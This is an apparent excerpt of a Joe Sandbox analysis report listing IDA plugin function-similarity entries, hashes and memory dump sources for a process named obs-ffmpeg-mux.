                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacetstd::locale::_
                                                            • String ID:
                                                            • API String ID: 228209623-0
                                                            • Opcode ID: e1649e7492c623a3dde3d0f52f4a7623223d295ee38f0812fc4da71757b835a0
                                                            • Instruction ID: 10f1a9dd965c6e5227d2eeea84eb337501d01b08a688632b2751f61a46c5cd16
                                                            • Opcode Fuzzy Hash: e1649e7492c623a3dde3d0f52f4a7623223d295ee38f0812fc4da71757b835a0
                                                            • Instruction Fuzzy Hash: DF212F3261EA8181DA50DB25F49016AB7A5FBD57A4F501232FB8E13BFADE3ED540CB04
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacetstd::locale::_
                                                            • String ID:
                                                            • API String ID: 228209623-0
                                                            • Opcode ID: 32040dcdf6bf28da0db548812edf55dba035f115e56f80641840b219345a5ef9
                                                            • Instruction ID: 2b9477421222c443fb7a8c2e4d0312deea3103ec0634d6b979f4ba52745ef9e4
                                                            • Opcode Fuzzy Hash: 32040dcdf6bf28da0db548812edf55dba035f115e56f80641840b219345a5ef9
                                                            • Instruction Fuzzy Hash: 09212F3261EB4581DA90DB15F49016AB7A1FBC47A4F101231FA8E13BAADE3ED540CB04
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacetstd::locale::_
                                                            • String ID:
                                                            • API String ID: 228209623-0
                                                            • Opcode ID: 6258fb388a7ff5065e1413a87192748a7c717fb9ed2cbe81c0465edb7363f7b0
                                                            • Instruction ID: 8fd288d8bcc415e9288d512e7f924d07e554dab72a024a5bc59b15bd7799eb8a
                                                            • Opcode Fuzzy Hash: 6258fb388a7ff5065e1413a87192748a7c717fb9ed2cbe81c0465edb7363f7b0
                                                            • Instruction Fuzzy Hash: 5A21212261EF8581DA90DB15F49026AB7A2FBC47A4F501631F78E53BBADE3ED540CB04
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 1467352782-3733052814
                                                            • Opcode ID: 3d5ad03003ffb9f93344a8bde9757900ad3769c4029a34a40f4fd4e2241e6ba1
                                                            • Instruction ID: c7160944ced0df3de61045dc841acf6b5bb438b0f33c4102790e83d13c8484f0
                                                            • Opcode Fuzzy Hash: 3d5ad03003ffb9f93344a8bde9757900ad3769c4029a34a40f4fd4e2241e6ba1
                                                            • Instruction Fuzzy Hash: 3971A132A0A68187DB668F75D4607797BA2EB04B84F148175EF4C67BC6CF2ED491CB04